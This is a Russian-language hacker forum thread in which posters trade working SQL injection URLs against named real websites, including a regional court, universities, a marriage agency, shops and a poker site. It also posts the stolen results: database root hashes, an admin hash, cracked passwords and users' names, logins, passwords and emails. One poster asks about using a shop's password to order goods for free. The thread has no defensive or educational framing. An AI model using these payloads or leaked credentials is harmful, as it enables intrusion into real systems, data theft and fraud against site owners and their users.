SQL Инъекции

To V.I.P

Code:

root: 3616438873d71bd2
ivax: 652fa1a75d18da89
wx: 68708852333c8a5e
pp: 1b112489580fbed1
air: 2a98610a18cbfe30

Поставил на расшифровку получил:

Code:

ivax:652fa1a75d18da89 - blaX
air:2a98610a18cbfe30 - agFa41

Продолжение Следует....

 

Краснодарсикй краевой суд
Таблицы: users
Поле ток 1 нашел: password

Code:

http://webwork.agora-soft.ru/p.php?CATEGORY=-4+union+select+concat_ws(char(58),version(),user(),database())+from+users/*

//Что-то меня по судам тянет =)

 

И вот ещё одна:

MTC - мож комута удастся выташить базу.

PHP:

http://www.recom.ru/mts/abonents/news/read/?id=-412+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),4,5,6,7,8,9,10/*

 

Code:

http://encycl.anthropology.ru/article.php?id=-3+union+select+1,concat(id,char(58),name,char(58),lastname),3,4,5,6,7,8,9,10+from+person+limit+0,1/*

Code:

http://www.oborudunion.ru/publications_st.php?id=1+and+1=-2+union+select+1,2,version(),4,id,6,7+from+ou_publications_st/*

Code:

http://www.indeks.ru/service.htm?id=-5+union+select+1,version(),3,4/*

натариусы Москвы

Code:

http://www.mosdoma.ru/static_inf.php?id=-1+union+select+1,concat(user,char(58),password),3,4,5,6+from+mysql.user+limit+0,1/*

 

nwags.ru
Сайт одного из питерских универов (точнее, сайт "академии при президенте РФ")

Code:

http://www.nwags.ru/index.phtml?id_page=11&id=-1+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8,9,10,11,12,13+from+acad_phpbb_users+limit+1,1/*

admin:bbb8aae57c104cda40c93843ad5e6db8

там 5я версия, кому интересно, можете посмотреть остальные таблицы) acad_users вроде есть.

 

www.clubpoker.net

Code:

http://www.clubpoker.net/showpage/?id=-67+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,version()),5+from+users+limit+2,1/*

http://www.clubpoker.net/showpage/?id=-67+UNION+SELECT+1,2,3,table_name,5+from+INFORMATION_SCHEMA.TABLES+limit+41,1/*

 

n1†R0x,
md5 - bbb8aae57c104cda40c93843ad5e6db8
pass - 111111111

 

www.incom-shina.ru
Покупаем шины
http://www.incom-shina.ru/catalog.php?model_id=-357%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

 

BIBIKA
Вот мой первый скуль, толька кол-во столбцов подобрать не удалось((

Code:

http://www.bibika.ru/list.php?id=14380586+and+u ser()%3C%3E1

 

Вот

PHP:

http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(user,char(58),password)+from+mysql.user/*

root:31145a7a1dc8740d


Международное брачное агентство «Союз двух сердец»

PHP:

http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4+from+news/*

Вытенул только news

 

root@localhost

 

http://olympus.ru/about/news/2006/01/31/-1+union+select+1,2,3,4,5,6,version()--

 

To V.I.P

Code:

http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,  concat(user,char(58),password)+from+mysql.user/* 

root:31145a7a1dc8740d - Расшифрованно и пасс: 518EA

 

http://www.diel.com.ua/folio/works.php?id=-48/**/union/**/select/**/1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(concat(database(),0x3a,version(),0x3a,user()),0x73),0x73),8,9,10/*#

 

medtorg.ru

Code:

http://www.medtorg.ru/podraz.php?id_num=-18+union+select+null,version(),null,null

www.dentland.com.ua

Code:

http://www.dentland.com.ua/katFul.php?_ID=-14+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7/*

 

karelinform.ru

PHP:

http://karelinform.ru/?id=-7488+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9/*

www.domkino.spb.ru-Кто-то выкладывал,но ч разрачил

PHP:

http://www.domkino.spb.ru/description.php?id=-258+union+select+1,2,concat(name,char(58),login,char(58),password,char(58),email),4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+user/*

Выцепляем лимитом.(+limit+4,1)
Имя:логин:ПаСС:Mail
Шурик:shurik:ahin:[email protected]
Андрей:andrey:andrey:[email protected]
Sergh:ss:ss:[email protected]
Джек-потрошитель:jack:jack:[email protected]

PHP:

http://www.kinomaniac.ru/movie.php?id=1151'+union+select+1,2/*

И ещё вапрос: Можно ли имея пасс shoop`а(магазина) заказать что небудь на-хал@ву?

 

www.nregion.com

user - nregion@localhost
database - wwwnregioncom
version - 4.1.18

 

offtop:
Пожалуйста юзайте Антибоян для темы "SQL иньекции"
Created by Constantine!

http://hlamidnik.h18.ru/SQLS.html

Сам уже забаянил =(

 

Кто идет на выставку Interop?

http://www.interop.ru/?page=newsview&id=-175%20union+select+1,1,1,1,1,1,1,1,1,1,1/*&offset=0&language=rus

 

http://thelist.ru/catalog.php?group=4&razdel=-1+union+select+table_name+from+information_schema.tables+limit+14,6/*

Спешу на работу но если потрудиться можно фсё вытащить!

http://www.interop.ru/?page=newsview&id=-175%20union+select+1,2,3,4,5,6,7,1,9,concat(name,char(58)),1+from+users+limit+0,1/*&offset=0&language=rus